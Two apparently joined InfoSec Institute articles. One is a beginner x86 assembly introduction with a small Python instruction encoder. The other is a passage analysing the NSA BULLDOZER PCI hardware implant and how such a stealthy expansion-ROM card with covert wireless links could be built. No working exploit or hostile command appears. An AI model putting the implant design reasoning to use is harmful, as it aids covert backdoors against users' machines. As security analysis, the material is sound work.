In a sense. Machine language is a close relative of assembly language. Typically, there is a one-to-one correspondence between assembly language and machine language instructions. In fact, they differ only in appearance. The processor understands only machine language, whose instructions consist of 1s and 0s. So, you need a program that can do this magic for you! This program is called the Assembler. “Writing code only with 1 & 0 is cumbersome, that’s why we don’t write machine code anymore,” he murmured…

What is an Assembler?

An assembler is a utility program that converts source code programs from assembly language into machine language, so the CPU can understand it. A picture is worth a thousand words:

Is Assembly Language Portable?

Absolutely Not! Assembly language is directly influenced by the instruction set and architecture of the processor. The instructions are native to the processor used in the system. In other words, porting an assembly language program from one computer to another with a different processor usually means starting over from scratch. For example, a program written in Intel assembly language cannot be executed on a Motorola or an ARM processor.

Which Assembler is the Best?

There are well over a dozen different assemblers available for the x86 processor running on PCs. They have widely varying feature sets and syntax. Some are suitable for beginners, some are suitable only for advanced programmers. Some are very well documented, others have little or no documentation. Some are supported by lots of programming examples, some have very little in the way of example code. Certain assemblers have tutorials and books available that use their particular syntax, others have nothing. Some are very basic, others are very complex.
Which assembler is best, then? Like many of life’s questions, there is no simple answer to the question “which assembler is best?” This is because different people have different criteria for judging what is “best”. Without a universal metric for judging between various assemblers, there is no way to pick a single assembler and call it the best. In this saga, we will use an assembler called JWasm. In the next chapter, I’ll tell you why we chose this assembler. Here is a small map I’ve designed to give you a global image of different assemblers.

How Does Java Relate to Assembly Language?

High-level languages such as C++ and Java have a one-to-many relationship with assembly language. A single statement in C++ expands into multiple assembly language or machine instructions. We can show how C/C++ statements expand into machine code. Most people cannot read raw machine code, so we will use its closest relative, assembly language. The following C++ code carries out two arithmetic operations and assigns the result to a variable. Assume myVariableA and myVariableB are integers:

int myVariableA;
int myVariableB = (myVariableA + 4) * 3;

Following is the equivalent translation to assembly language. The translation requires multiple statements because assembly language works at a detailed level:

mov eax,myVariableA ; move myVariableA to the eax register
add eax,4 ; add 4 to the eax register
mov ebx,3 ; move 3 to the ebx register
imul ebx ; multiply eax by ebx
mov myVariableB,eax ; move eax to myVariableB

A statement in a high-level language is typically translated into several assembly language instructions, and a lot of 1 and 0 bits in binary form.
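To make the one-to-one link between assembly and machine language more tangible, here is a toy "assembler" written in Python. It is only a sketch under loud assumptions: the function name encode and its tiny parser are invented for this illustration, and it supports just three register-only forms (add reg,imm8, mov reg,imm32 and the one-operand imul reg). The two mov instructions that touch myVariableA and myVariableB are left out because their encodings depend on where the assembler places those variables in memory.

```python
import struct

# Register numbers used by the x86 opcode and ModRM encodings.
REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}


def encode(instruction):
    """Encode one instruction into 32-bit x86 machine code.

    Toy scope (an assumption of this sketch): only 'add reg,imm8',
    'mov reg,imm32' and the one-operand 'imul reg' are handled.
    """
    mnemonic, _, operands = instruction.partition(" ")
    ops = [op.strip() for op in operands.split(",")]
    if mnemonic == "add":
        imm = int(ops[1])
        if not -128 <= imm <= 127:
            raise ValueError("this sketch only handles 8-bit immediates")
        # Opcode 83 /0 ib: ModRM = 11 000 reg
        return bytes([0x83, 0xC0 | REG[ops[0]], imm & 0xFF])
    if mnemonic == "mov":
        # Opcode B8+rd followed by a little-endian 32-bit immediate
        return bytes([0xB8 + REG[ops[0]]]) + struct.pack("<I", int(ops[1]))
    if mnemonic == "imul":
        # Opcode F7 /5: ModRM = 11 101 reg
        return bytes([0xF7, 0xE8 | REG[ops[0]]])
    raise ValueError("unsupported instruction: " + instruction)


program = ["add eax,4", "mov ebx,3", "imul ebx"]
for line in program:
    print(line.ljust(12), encode(line).hex(" "))
```

Each line of assembly maps to exactly one short run of bytes, which is the "differ only in appearance" point made earlier. A real assembler such as JWasm additionally handles memory operands, labels, directives, and the executable file format.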
Well, ultimately there has to be something to execute the machine language instructions. This is the system hardware, which consists of digital logic circuits and the associated support. Pff !! .., This is all crap! I don’t get anything in this code and I am still not convinced … In JAVA, there is a reduced risk of bugs, no absence of library routines, programs are easier to maintain. And you don’t get BORED writing long routines. Why Should I Care? It’s fast– Assembly programs are generally faster than programs created in higher level languages. Often, programmers write speed-essential functions in Assembly. It’s powerful – You are given unlimited power over your assembly programs. Sometimes, higher level languages have restrictions that make implementing certain things difficult. It’s small– Assembly programs are often much smaller than programs written in other languages. This can be very useful if space is an issue. It’s magic - To investigate an application whose source code is not available (and most frequently, this is the case), it is necessary to discover and analyze its algorithm, which is spread over the jungle of assembly code. Or, to understand how a client/server application communicates, it is necessary to analyze packets and reverse engineer the undocumented protocol. Sometimes, when a specific vulnerability is exposed, a company may discover more related bugs, so they fix them silently with no public announcements, and a person may reverse engineer the patches or fixes and detect what changes have been made to a particular file and possibly create exploit code to exploit it. Also, investigation of undocumented features of the operating system or a file format is also carried out using Assembly. Other tasks that can be done using this language include searching for backdoors, neutralizing viruses, customizing applications for the hacker’s own goals, cracking secret algorithms — the list is endless. 
The area of application of Assembly language is so wide that it is much easier to list the areas to which it has no relation. Assembly language is the only computer language that lets you talk to a computer in its native tongue, commanding the hardware to perform exactly as you say. If you like to be in charge, if you like to control things, if you’re interested in details, you’ll be right at home with assembly language. Believe me, Assembly is the true language for programmers ! A hacker that hasn’t mastered Assembly language is not a hacker because nothing really moves without it. Who Needs to Learn It? Software Vulnerability Analysts, Bug Hunters, Shell-coders, Exploit Writers, Reverse Code Engineers, Virus Authors, Malware Analysts .. And many more! Sometimes, some math applications or 3D games need optimization, so they call Assembly. For instance, consider the situation, in which an infamous General Protection Fault window pops up, containing an error message informing the user about a critical error. Application Programmers or Software Engineers, cursing and swearing, obediently close the application and are at a loss (they only guess that this is the program’s karma). All of these messages and dumps are unintelligible to them. The situation is different for the ones that have mastered Assembly. These guys go by the specified address, correct the bug, and often recover unsaved data. What Types of Programs Will I Create? I’d also like to mention that all examples included in this saga were tested under operating systems of the Windows NT family from Windows 2000 upwards. Therefore, although I did my best, I cannot guarantee that all examples will work under Windows 9x systems or Windows ME. You can write desktop, networking, or database management apps; You can write gaming and DirectX apps; You can write crackmes, trainers, or security tools.. … In Assembly, you are limited only by your imagination. Tiny Web Browser from the WinAsm Forum. 
EzProcess : Process/Thread Manager Program from the WinAsm Forum. Oldies but Goodies, PacMan in pure ASM : For our beloved crackers, a key generator from FOFF Team : Why x86 Family Processors? Why Windows? Assembly language programs can be written for any operating system and CPU model. Most people at this point are using Windows on x86 CPUs, so we will start off with programs that run in this environment. Once a basic grasp of the assembly language is obtained, it should be easy to write programs for different environments. What Background Should I Have? You should have programmed in at least one structured high-level language, such as Java, C, C++, Pascal, Python, or Visual Basic. Generally speaking, you should know what is a variable, an array, a string, what are functions & how to use an IF/WHILE statement to solve programming problems. It’s not a must, but it is advisable. Listen gentleman: Now you know that any programming task that can be done in a high level language can also be done in Assembly language since all high level languages have to compile source code down to Assembly language code level for CPU execution. I hope that you understand also that Assembly is more needed when size or time speed matter. Finally I’m sure that you get the idea that Assembly is CPU-dependent, we are focusing the x86-32bits family here, under the Windows platform. With that piece of information in hand, we shall go off to next chapter, setting up an environment development with the right tools. What about meeting tomorrow folks? Same time same place. Bring your laptops. The girl: Humm!! Impressive. Tell me, what is that question you wanted to ask me? Me: Aha!! Let me ask you first what is your name? Her: They call me Megabyte. You? Me: They call me Noteworthy. Were you interested in the conversation? Her : Oh yes : ) Me: So what about joining us tomorrow? Her: That would be my pleasure. See you tomorrow. source: x86 Assembly Language, Part 1 - InfoSec Institute
-
This article is the second part of a series on NSA BIOS Backdoor internals. This part focuses on BULLDOZER, a hardware implant acting as malware dropper and wireless communication “hub” for NSA covert operations. Despite that BULLDOZER is a hardware, I still use the word “malware” when referring to it because it’s a malicious hardware. Perhaps the term “malware” should refer to both malicious software and malicious hardware, instead of referring only to the former. I’d like to point out why the BULLDOZER is classified as “god mode” malware. Contrary to DEITYBOUNCE, BULLDOZER is not a name in the realms of “gods”. However, BULLDOZER provides capabilities similar to “god mode” cheat in video games—which make the player using it close to being invincible—to its payload, GINSU. Therefore, it’s still suitable to be called god mode malware. The presence of BULLDOZER is very hard to detect, even with the most sophisticated anti malware tool during its possible deployment timeframe. As for GINSU, we will look into GINSU in detail in the next installment of this series. The NSA ANT Server document—leaked by Edward Snowden—describes BULLDOZER briefly. This article presents an analysis on BULLDOZER based on technical implications of the information provided by the NSA document. Despite lacking in many technical details, we could still draw a technically-sound analysis on BULLDOZER based on BIOS and hardware technology on the day BULLDOZER became operational, just like in the DEITYBOUNCE case. Introduction to GINSU-BULLDOZER Malware Combo BULLDOZER doesn’t work in isolation. It has to be paired with the GINSU malware to be able to work. As you will see in the next installment of this article, GINSU is a malicious PCI expansion ROM. Therefore, at this point, let’s just assume that GINSU is indeed a malicious PCI expansion ROM and BULLDOZER is the hardware where GINSU runs. 
This means BULLDOZER is a PCI add-in card, which is in line with the information in the NSA ANT server document. Before we proceed to analyze BULLDOZER, let’s look at the context where BULLDOZER and GINSU work. GINSU and BULLDOZER are a software and hardware combo that must be present at the same time to work. We need to look at the context where GINSU and BULLDOZER operate in order to understand their inner working. Figure 1 shows the deployment of GINSU and BULLDOZER in the target network. Figure 1 GINSU Extended Concept of Operations. Courtesy: NSA ANT Product Data Figure 1 shows BULLDOZER hardware implanted in one of the machines in the target network. The NSA Remote Operation Center (ROC) communicates via OMNIGAT with the exploited machine through an unspecified wireless network. This implies the GINSU-BULLDOZER malware combo targets machines in air-gapped networks or machines located in a network that is hard—but not impossible—to penetrate. In the latter case, using machines with malware-implanted hardware is more economical and/or stealthier compared to using an “ordinary” computer network intrusion approach. Let’s look closer at the technical information revealed by the NSA ANT product data document, before we proceed to deeper technical analysis. The NSA ANT server product data document mentions: GINSU provides software application persistence for the Computer Network Exploitation (CNE) implant—codenamed KONGUR—on systems with the PCI bus hardware implant, BULLDOZER. The technique supports any desktop PC system that contains at least one PCI connector (slot) and uses Microsoft Windows 9x, 2000, 2003 server, XP, or Vista. The PCI slot is required for the BULLDOZER hardware implant installation. BULLDOZER is installed in the target system as a PCI hardware implant through “interdiction”—fancy words for installing additional hardware in the target system while being shipped to its destination. 
After fielding, if KONGUR is removed from the system as a result of operating system upgrade or reinstallation, GINSU can be set to trigger on the next reboot of the system to restore the software implant. It’s clear that there are three different components in the GINSU-BULLDOZER combo from the four points of information above and from Figure 1. They are as follows: The first component is GINSU. The GINSU code name is actually rather funny because it refers to a knife that was very popular in 1980s and 1990s via direct sell marketing. Perhaps the creator of the GINSU malware refers to the Ginsu knife’s above average capability to cut through various materials. GINSU is possibly a malicious PCI expansion ROM—PCI expansion ROM is also called PCI option ROM in many PCI-related specifications; I will use both terms in this article. GINSU might share some modules with DEITYBOUNCE because both are a malicious PCI expansion ROM—see the DEITYBOUNCE analysis at NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute. However, it differs in many other aspects. First, GINSU runs on the NSA custom PCI add-in card, codenamed BULLDOZER. Therefore, GINSU could be much larger in size compared to DEITYBOUNCE because NSA controls the size of the flash ROM on the PCI add-in card. This means GINSU could incorporate a lot more functions compared to DEITYBOUNCE. Second is the type of PCI add-in card type that GINSU might use. From Figure 1, GINSU hardware (BULLDOZER) seems to masquerade as a WLAN PCI add-in card or other kinds of PCI add-in cards for wireless communication. This implies the PCI class code for the BULLDOZER hardware that contains GINSU probably is not a PCI mass storage controller like the one used by DEITYBOUNCE. Instead, the BULLDOZER PCI chip very possibly uses a PCI wireless controller class code. The second component is named BULLDOZER. 
This codename perhaps refers to the capability of BULLDOZER to push large quantities of materials to their intended place, which in the context of GINSU provides the capability to push the final payload (KONGUR) to the target systems. In this particular malware context, BULLDOZER refers to the PCI add-in card (hardware) implant installed in the target machine. BULLDOZER is a custom PCI add-in card. It very probably masquerades as a PCI WLAN add-in card because it provides a wireless communication function that requires a certain kind of antenna. This doesn’t prevent BULLDOZER from masquerading as another kind of PCI add-in card, but the presence of a physically larger antenna in the PCI WLAN card could boost the wireless signal strength. Therefore, the NSA might use the PCI WLAN card form factor to their advantage. We will look deeper into BULLDOZER implementation later. The third (last) component is named KONGUR. KONGUR is a somewhat mysterious name. It may refer to Kongur Tagh Mountain in China’s Xinjiang-Uyghur Autonomous Region. This could mean that the GINSU-BULLDOZER combo was devised for a campaign to infiltrate Chinese computer systems. After all, the Xinjiang-Uyghur Autonomous Region is famous for its people’s rebellion against the Chinese central government. This doesn’t mean that the GINSU-BULLDOZER combo wasn’t used against other targets in other campaigns though. KONGUR is Windows malware that targets Windows 9x, 2000, XP, Server 2003 and Vista. GINSU provides the delivery and reinstallation mechanism for KONGUR. We can view KONGUR as the payload of the GINSU-BULLDOZER combo. It’s possible that KONGUR could also work on Windows Vista derivatives, such as Windows 7 and Windows Server 2008, or even later Microsoft operating systems (OS), such as Windows 8, Server 2012, and 8.1, because KONGUR also targets Windows Vista, and we don’t know which 0-day exploit it uses or whether that exploit has already been patched.
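The class code point made for the first component can be sketched in a few lines of Python. The layout of the configuration-space register at offset 0x08 (revision ID, programming interface, sub-class, base class) and the base class numbers come from the PCI specification; the function names and the three sample register values are hypothetical and only serve the illustration. Nothing here is taken from the NSA document.

```python
# Base class codes defined by the PCI specification (subset).
BASE_CLASSES = {
    0x01: "mass storage controller",
    0x02: "network controller",
    0x0D: "wireless controller",
}


def decode_class_register(dword):
    """Split the 32-bit value at PCI config offset 0x08 into its fields."""
    return {
        "base_class": (dword >> 24) & 0xFF,
        "sub_class": (dword >> 16) & 0xFF,
        "prog_if": (dword >> 8) & 0xFF,
        "revision": dword & 0xFF,
    }


def describe(dword):
    """Return a readable name for the base class, or 'other'."""
    fields = decode_class_register(dword)
    return BASE_CLASSES.get(fields["base_class"], "other")


# Hypothetical sample register values, not read from real hardware.
for value in (0x01000002, 0x0D800000, 0x02800001):
    print(hex(value), describe(value), decode_class_register(value))
```

A card that wants to look like an ordinary wireless adapter would report base class 0x0D, or, as WLAN cards are often seen doing, base class 0x02 with sub-class 0x80 ("other network controller"), rather than the mass storage class 0x01 attributed to DEITYBOUNCE.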
This article doesn’t delve deep into KONGUR and GINSU; the focus is on its hardware delivery mechanism, the BULLDOZER malware. The GINSU-BULLDOZER malware combo is the second NSA BIOS malware we have looked into that “abuses” the PCI expansion ROM, after DEITYBOUNCE. Well, we could say that the NSA is quite fond of this technique. Though, as you will see later, it’s a justified fondness. Anyway, this hypothesis on the GINSU-BULLDOZER combo is bound to have subtle inaccuracies because I have no sample of the malware combo to back up my assertions. I’m very open to constructive criticism in this regard. Now, we are going to look into BULLDOZER technical details. However, if you’re not yet familiar with the PCI bus protocol, please read the first part of this series (NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). There are links in that article that further break down the required prerequisite knowledge, just in case you’re not up to speed yet.

BULLDOZER: NSA Malicious PCI Add-In Card

In this section we delve into details of the procedures that the NSA probably carries out to create the BULLDOZER hardware implant. Surely, the exact type of hardware used by the NSA may very well be different. However, I try to draw the closest analogy possible from the public domain knowledge base. Despite the NSA’s superiority compared to the private sector, all of us are bound to the laws of physics and must adhere to the hardware protocols in the target systems. Therefore, the NSA’s approach to building BULLDOZER couldn’t be that much different from the explanation in this article. In the BULLDOZER Implementation Recap section, I try to draw the most logical hypotheses on the BULLDOZER hardware implant, based on the explanation of the process of designing and creating a PCI add-in card similar to BULLDOZER. PCI add-in cards are installed on PCI expansion slots on the motherboard. Figure 2 shows a PCI add-in card sample.
This PCI add-in card is a PCI WLAN card. Figure 2 highlights the PCI “controller” chip from Ralink—a WLAN controller—and the PCI slot connector in the add-in card. The term “controller” is a generic name given to a chip that implements the core function in a PCI add-in card. PCI hardware development documentation typically uses this term, as do PCI-related specifications. Figure 2 PCI add-in card sample. Courtesy: D-Link. I use a PCI WLAN card as an example because the GINSU extended concept of operation implies that the BULLDOZER hardware implant is a PCI wireless controller card. As to what kind of wireless protocol it uses, we don’t know. But, the point is, BULLDOZER could masquerade as a PCI WLAN card for maximum stealth. It would look innocuous that way. Figure 2 doesn’t show the presence of any flash ROM in the PCI add-in card. The PCI add-in card typically stores the PCI option ROM code in the flash ROM. The purpose of Figure 2 is just to show you the typical appearance of the PCI add-in card for wireless communications. We’ll get into the flash ROM stuff later on. PCI Add-In Card in OEM Desktop PC Circa 2008 Now, let’s look at how a typical 2008 desktop PC could be implanted with such a card. One of the desktop PCs from a system builder that still had a PCI slot(s) in 2008 is the Lenovo ThinkCentre M57 Desktop PC. I chose a Lenovo desktop PC as an example because its products were widely used in China—besides other parts of the world. It could probably be one of the victims of the GINSU-BULLDOZER campaign. Who knows? The Lenovo ThinkCentre M57 has two PCI slots. Let’s say NSA “interdicts” such a system. They can install BULLDOZER in it and then replace the user guide as well to make the BULLDOZER implant look like a legitimate PCI add-in card that comes with the PC, just in case the user checks the manual before using the system. 
Figure 3 Lenovo ThinkCentre M57 PCI Add-In Card Replacement Instructions (edited version of the original ThinkCentre Hardware Maintenance Manual instructions). Courtesy: Lenovo.

The Lenovo ThinkCentre Hardware Maintenance Manual even comes with instructions to replace a failed PCI add-in card. Figure 3 shows the instructions to replace a PCI add-in card in an “exploded view” style. The hardware replacement shown in Figure 3 is a pedestrian task; any NSA field agent can do it.

PCI Wireless Communication Add-In Card Hardware and Software Co-Development

Now, let’s look at the steps to develop a PCI wireless communication add-in card in general, because we presume that BULLDOZER falls within this PCI add-in card category. I’m quite sure the NSA also follows the approach explained here, despite being a very advanced spying agency. Only the tools and hardware it uses are probably different, perhaps custom-made. From a cost point of view, using a Commercial Off-The-Shelf (COTS) approach in creating BULLDOZER hardware would be more cost-effective, i.e. using tools already on the market costs much less than custom tools. COTS benefits from economies of scale and market competition in a way custom tools do not. Moreover, from an operational standpoint, the GINSU-BULLDOZER target systems would likely evolve after five years, which dictates the use of new tools. Therefore, obsolescence, which usually plagues COTS solutions, is not a problem in the GINSU-BULLDOZER campaign. The latter fact strengthens my suspicion that the NSA very probably uses the COTS approach. We’ll look at this COTS approach shortly. The “crude” steps to develop a PCI add-in card and its assorted software in general, via the COTS approach, are as follows:

1. High-level design. This step involves the high-level decision on what kind of PCI controller chip would be created for the PCI add-in card, what features the chip would implement, and what auxiliary support chip(s) are required. For example, in the case of a PCI wireless communication add-in card, typically you will need a separate Digital Signal Processor (DSP) chip, or you need to buy the DSP logic design from a DSP vendor and incorporate that design into your PCI Field Programmable Gate-Array (FPGA).

2. Hardware prototyping. This step involves creating the PCI controller chip prototype with a PCI FPGA development board. Typically, the language used to develop the PCI controller chip in the FPGA is either VHDL or Verilog. This mostly depends on the FPGA vendor.

3. Software (device driver) development. This step involves creating a prototype device driver for the PCI add-in card for the target Operating System (OS). For example, if the device would be marketed mostly to Windows users, then creating a Windows device driver would take priority. Drivers for other target OSes would be developed later, or probably not at all if market demand on the alternative OS doesn’t justify the cost involved in developing the driver. This step is typically carried out in parallel with hardware prototyping once the first iteration of the FPGA version of the chip is available. Some FPGA vendors provide a “template” driver for certain target OSes to help with the driver development. This way, the device driver development can run in parallel with the chip design. There are also third-party “driver template” vendors which are endorsed by the FPGA vendors, such as Jungo WinDriver (see WinDriver - USB/PCI Device Driver Development Toolkit).

4. Chip fabrication, also known as the making of the Application Specific Integrated Circuit (ASIC). In this step, the first design revision of the chip is finished and the design is sent to a chip fabrication plant, such as TSMC, UMC or another contract semiconductor fab. This is an optional step though, because some low-volume PCI add-in cards these days are built around an FPGA anyway. If the cost of chip fabrication doesn’t make economic sense against creating the product out of an FPGA, then the final product uses an FPGA. Well, the NSA has several semiconductor fabs (for example, see NSA plant in San Antonio shrouded in secrecy - Houston Chronicle). One of the NSA’s fabs was probably used to fabricate the BULLDOZER PCI controller chip.

5. Compatibility test on the PCI hardware-software “combo”. The chip vendor carries out the compatibility testing first. If the target OS is Windows, Microsoft also carries out additional compatibility testing. On the Windows platform, there is the so-called “WHQL” testing. WHQL stands for Windows Hardware Quality Labs. WHQL testing is Microsoft’s testing process, which involves running a series of tests on third-party hardware or software, and then submitting the log files from these tests to Microsoft for review. In case the primary target OS is not Windows, only the test from the hardware vendor is carried out. The NSA very probably also carries out this kind of test, but for an entirely different purpose, i.e. to make sure the driver works as stealthily as possible or to mislead the user into thinking the driver is just an ordinary PCI device driver.

Steps 2 and 3 are actually iterative steps. The PCI hardware prototype goes through several iterations until it matures and is ready for fabrication. Step 4 could also happen as an iterative step, i.e. there are several revisions of the chip. The first revision might have a flaw or performance weakness that must be improved, despite being a functional design. In the commercial world, ASICs typically have several revisions. Each revision is marked as a “stepping”. You would find the word “stepping” mentioned in many CPU, chipset or System-on-Chip (SoC) technical documents.

“Simulating” BULLDOZER Hardware

Now, let’s look into the process of developing a specific PCI add-in card, i.e.
a PCI add-in card with wireless communication as its primary function. We focus on this kind of PCI add-in card because BULLDOZER connects to the outside world (to OMNIGAT in Figure 1) via an unspecified wireless connection. For this purpose, we look into the hardware prototyping step in more detail. Let’s start with some important design decisions in order to emulate BULLDOZER capabilities, as follows:

- The prototype must have the required hardware to develop a custom wireless communication protocol. The reason is that the wireless communication protocol used by BULLDOZER to communicate with OMNIGAT must be as stealthy as possible, despite probably using the same physical antenna as a PCI WLAN card.
- The prototype must have implemented PCI expansion ROM hardware. The reason is that GINSU is malicious PCI expansion ROM code that must be stored in a functional PCI expansion ROM chip to work.
- GINSU is configurable, or at the very least it can be optionally triggered, based on the NSA ANT server document. This means there must be some sort of non-volatile memory in the prototype to store GINSU parameters. It could be in the form of a Non-Volatile RAM (NVRAM) chip, like in the DEITYBOUNCE case. Storing the configuration data in a flash ROM or other kinds of ROM is quite unlikely, given the nature of flash ROM, which requires a rather complicated procedure to rewrite.

The next step is to choose the prototyping kit for the hardware. There are many PCI FPGA prototyping boards on the market. We will look into one of them from Sundance (DSP and FPGA Solutions - Sundance Multiprocessor Technology Ltd.). Sundance is probably a very obscure vendor to you. However, it is one of the vendors that provide a PCI development board for Software-Defined Radio (SDR) applications. You might be asking, why would I pick a PCI SDR development board as an example? The reason is simple: SDR is the best approach when you want to develop your own wireless protocol.
You can tune the frequency, the type of modulation, transmitter power profile, and other parameters needed to make the protocol as stealthy as possible.

BULLDOZER Hardware “Simulation” with Sundance SMT8096 SDR Development Kit

There is usually more than one FPGA in a typical PCI SDR development board. We are going to look into one of the Sundance products that was available on the market before 2008, the year the GINSU-BULLDOZER malware combo was operational. I picked the Sundance SMT8096 SDR development kit as the example in this article. This kit was available on the market circa 2005. The kit consists of several connected boards with a “PCI carrier” board acting as the host of all of the connected boards. The PCI carrier board connects the entire kit to the PCI slot in the development PC. Figure 4 shows the entire Sundance SMT8096 SDR development kit hardware.

Figure 4 Sundance SMT8096 SDR development kit. Courtesy: Sundance Multiprocessor Technology Ltd.

Figure 4 shows the components of the Sundance SMT8096 SDR development kit. As you can see, the development kit consists of several circuit boards as follows: SMT395-VP30 board, which contains the Texas Instruments TI DSP C6416T chip and the Xilinx Virtex II Pro FPGA. The TI DSP C6416T chip provides the primary signal processing in the development kit, while the Virtex II FPGA provides the reconfigurable signal processing part. Actually, it’s the FPGA in this board that provides the “software” in the “software-defined” part of the SDR abbreviation. The SMT350 board provides the Analog-to-Digital Converter (ADC) / Digital-to-Analog Converter (DAC) functions. This board provides two functions. First, it receives the analog input from the input antenna and then converts that input into its equivalent digital representation before feeding the result to the signal processing board.
Second, it receives the digital output of the signal processing board and converts that digital signal into an analog signal to be fed into the output antenna. The input and output antenna could be the same or different, depending on the overall design of the SDR solution. The SMT368 board provides yet another FPGA, a Xilinx Virtex 4 SX35 FPGA. This board provides “protocol/data-format” conversion function as you can see in Figure 5 (Sundance SMT8096 SDR development kit block diagram). SMT310Q is the PCI carrier board. It’s this board that connects to the host (desktop PC) motherboard via the PCI connector. This board provides the PCI logical and physical interface into the host PC. Figure 5 shows the block diagram of the entire SDR development kit. It helps to understand interactions between the SDR development kit components. Figure 5 Sundance SMT8096 Development Kit Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Let’s look into SMT310Q PCI carrier board, because this board is the visible one from the motherboard BIOS perspective. We’ll focus on the technology required to communicate with the host PC instead of the technology required for the wireless communication, because we have no further clues on the latter. Moreover, I’m not an expert in radio communication technology in anyway. The SMT310Q PCI carrier board has a QuickLogic V363EPC PCI bridge chip, which conforms to PCI 2.1 specifications. This chip was developed by V3 Semiconductor, before the company was bought by QuickLogic. The V363EPC PCI Bridge connects the devices on the SMT8096 development kit to the host PC motherboard—both logically and electrically—via the PCI slot connector. This PCI bridge chip is not a PCI-to-PCI bridge, rather it’s a bridge between the custom bus used in the SMT8096 development kit and the PCI bus in the host PC. The correct term is Local Bus to PCI Bridge. 
Local bus in this context refers to the custom bus in the SMT8096 development kit, used for communication between the chips on the development kit boards.

At this point we have made the important design decisions, picked the PCI hardware development kit to work with, and looked into the PCI-specific chip in the development kit. It’s time to get into the details of the design implementation. The steps to implement the design are as follows:

Assuming the wireless communication protocol has been defined thoroughly, the first step is to implement the protocol in the form of DSP chip firmware code and FPGA designs. The DSP chip firmware consists of the code required to initialize the DSP chip itself, code to initialize the interconnection between the DSP chip and the Local Bus to PCI Bridge via the Local Bus interface, and code for other auxiliary functions. Assuming we use the Sundance SMT8096 kit, this step consists of creating the firmware code for the Texas Instruments C6416T DSP chip and creating the FPGA designs for the Xilinx Virtex-II Pro and Xilinx Virtex-4 SX35. We are not going to delve into the details of this step, as we don’t know the specifics of the wireless communication protocol.

The second step is to customize the hardware to support the PCI expansion ROM. This is required because we assume the GINSU malware is malicious PCI expansion ROM code. In this step we configure the SMT310Q carrier board to support the PCI expansion ROM, because this board is the one that interfaces with the host (x86/x64 desktop) PCI bus, at both the logical and the physical level. We have to enable the Expansion ROM Base Address Register (XROMBAR) in the QuickLogic V363EPC PCI bridge chip (Local Bus to PCI Bridge) on the SMT310Q carrier board via hardware configuration, and we have to provide a flash ROM chip on the board to store the PCI expansion ROM code as well.
If you’re not familiar with XROMBAR, refer to my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) for the details.

Now, let’s focus on the last step: customizing the hardware required for the PCI expansion ROM to work. It’s the SMT310Q carrier board that implements the PCI bus protocol support in the SMT8096 PCI SDR development kit. Therefore, we are going to scrutinize the SMT310Q carrier board to find out how we can implement the PCI expansion ROM on it. We start with the board block diagram. Figure 6 shows the SMT310Q block diagram. The block diagram is not a physical block diagram of the board. Instead, it’s a logical block diagram depicting the logical interconnections between the board components.

Figure 6 SMT310Q Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd.

Figure 6 shows blocks marked as TIM, i.e. TIM 1, TIM 2 and so on. TIM is an abbreviation for Texas Instruments Module. TIM is a standard interconnection between boards using a Texas Instruments DSP chip and other boards. I couldn’t find the latest version of the TIM specification. However, you can find TIM version 1.01 on the net. Although the name TIM implies that a DSP should be connected via this interconnect, in reality anything that conforms to the specification can be connected. It’s important to know about TIM, because we are going to use it to “wire” the PCI expansion ROM and also to “wire” NVRAM into the SMT310Q carrier board later.

Figure 6 shows that the QuickLogic V363EPC PCI bridge, marked as V3 PCI Bridge, connects to the TIMs via the 32-bit Global Bus. The 32-bit Global Bus corresponds to the LAD[31:0] multiplexed address and data lines in the QuickLogic V363EPC datasheet. This means the logical and physical connection from the QuickLogic V363EPC to the PCI expansion ROM and the NVRAM in our design will be based on the Global Bus.
Now, let’s look at how the QuickLogic V363EPC exposes devices wired to the TIMs into the host x86/x64 CPU address space. The QuickLogic V363EPC uses so-called “data transfer apertures” to map devices connected through LAD[31:0] into the host x86/x64 CPU address space. These apertures are basically address ranges claimed by the PCI Base Address Registers (BARs) in the QuickLogic V363EPC. The QuickLogic V363EPC datasheet uses a different naming scheme for the PCI BARs. Figure 7 shows the PCI BARs marked as PCI_BASEx registers. The PCI_MAPx registers in Figure 7 control the amount of memory or I/O range claimed by the PCI_BASEx registers. If you are new to PCI configuration space registers, my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) has a deeper explanation of the subject. You can compare the “standard” PCI configuration space registers explained there with the ones shown in Figure 7.

Figure 7 QuickLogic V363EPC PCI configuration registers. Courtesy: QuickLogic V363EPC datasheet.

Let’s look deeper into the “data transfer aperture” in the QuickLogic V363EPC. The “aperture” is basically address remapping logic, i.e. it remaps addresses from the host x86/x64 CPU address space into the local address space on the SMT310Q PCI add-in board. If you’re new to address remapping, you can read a sample of the concept in System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute. Figure 8 shows a simplified block diagram of the QuickLogic V363EPC aperture logic (address remapper).

Figure 8 QuickLogic V363EPC Aperture Logic

Figure 8 shows that the QuickLogic V363EPC claims two different ranges in the PCI address space of the host x86/x64 CPU address space. We are only going to delve into the first range, claimed by the PCI_BASE0 register.
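To make the aperture idea more concrete, here is a minimal Python sketch of the remapping described above. It is only a model of the concept, not the V363EPC register interface: the class name, the field names and the example addresses are all hypothetical, and the real chip derives its window size and local base from the PCI_MAPx register fields documented in the datasheet.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Aperture:
    """Simplified PCI-to-local aperture: a window in host address space
    that is remapped onto a window in the card's local bus address space.
    All field names and values are hypothetical illustrations."""
    pci_base: int    # host-side base address (what a BAR would hold)
    local_base: int  # local bus base address the window maps onto
    size: int        # window size in bytes, must be a power of two

    def __post_init__(self):
        if self.size <= 0 or self.size & (self.size - 1):
            raise ValueError("aperture size must be a power of two")
        if self.pci_base % self.size or self.local_base % self.size:
            raise ValueError("base addresses must be aligned to the size")

    def claims(self, host_addr: int) -> bool:
        """True if the bridge would claim a PCI access to host_addr."""
        return self.pci_base <= host_addr < self.pci_base + self.size

    def to_local(self, host_addr: int) -> int:
        """Translate a claimed host address into a local bus address."""
        if not self.claims(host_addr):
            raise ValueError("address is outside the aperture")
        offset = host_addr & (self.size - 1)  # keep only the low bits
        return self.local_base | offset       # swap in the local base


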